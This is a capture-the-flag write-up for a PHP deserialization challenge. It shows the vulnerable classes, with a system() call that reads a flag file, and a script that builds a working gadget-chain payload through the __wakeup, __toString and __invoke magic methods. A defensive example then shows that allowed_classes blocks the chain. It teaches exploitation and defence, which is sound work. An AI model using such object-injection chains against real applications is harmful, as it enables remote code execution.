Challenge link: File Reader
The code is:
<?php
class A {
    public $file;
    public $luo;

    public function __construct() {
    }

    // Runs when the object is used as a string
    public function __toString() {
        $function = $this->luo;
        return $function();
    }
}

class B {
    public $a;
    public $test;

    public function __construct() {
    }

    // Runs automatically during unserialize()
    public function __wakeup() {
        echo($this->test);
    }

    // Runs when the object is called like a function
    public function __invoke() {
        $this->a->rce_me();
    }
}

class C {
    public $b;

    public function __construct($b = null) {
        $this->b = $b;
    }

    public function rce_me() {
        echo "Success!\n";
        system("cat /flag/flag.txt > /tmp/flag");
    }
}

The deserialization code I wrote:
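<?php
class A {
    public $file;
    public $luo;
}

class B {
    public $a;
    public $test;
}

class C {
    public $b;
}

// 1. Build the command-execution class
$c = new C();

// 2. Build class B and attach the C object
$b = new B();
$b->a = $c;

// 3. Build class A; the luo property points to the B object (triggers __invoke)
$a = new A();
$a->luo = $b;

// 4. Bind the B object's test property to the A object (echo triggers __toString)
$b->test = $a;

// Generate the final serialized payload
echo serialize($b);
?>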
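
Seen from the defending side, the chain above only runs because unserialize() is allowed to instantiate any loaded class. The following is an added example, not part of the original write-up or the challenge: it compares the default call with `allowed_classes` set to false. It assumes PHP 7.4 or later; `chain_reached()` and the `C::$reached` marker are hypothetical stand-ins, with the `system()` call replaced by a flag.

```php
<?php
// Added example (not from the original write-up). Stand-ins for the challenge
// classes: same magic methods, but rce_me() only sets a flag instead of
// calling system(), so the script is harmless to run.
class A {
    public $file;
    public $luo;
    public function __toString() { $function = $this->luo; return $function(); }
}
class B {
    public $a;
    public $test;
    public function __wakeup() { echo($this->test); }
    public function __invoke() { $this->a->rce_me(); }
}
class C {
    public $b;
    public static $reached = false;   // assumption: marker replacing system()
    public function rce_me() { self::$reached = true; }
}

// Hypothetical helper: unserialize $data with $options and report whether
// the __wakeup -> __toString -> __invoke -> rce_me chain executed.
function chain_reached(string $data, array $options): bool {
    C::$reached = false;
    ob_start();                        // swallow anything __wakeup echoes
    try {
        unserialize($data, $options);
    } catch (\Throwable $e) {
        // __toString() returns null here, which raises an Error only after
        // rce_me() has already run; the sink is reached either way.
    } finally {
        ob_end_clean();
    }
    return C::$reached;
}

// Constructed input: the same object graph the write-up serializes.
$b = new B(); $a = new A();
$b->a = new C(); $a->luo = $b; $b->test = $a;
$payload = serialize($b);

// Default options: any loaded class may be instantiated, so __wakeup fires.
var_dump(chain_reached($payload, []));
// Hardened: objects become __PHP_Incomplete_Class and no magic method runs.
var_dump(chain_reached($payload, ['allowed_classes' => false]));
```

Where the data does not need to carry objects at all, a format such as JSON avoids the magic-method surface entirely.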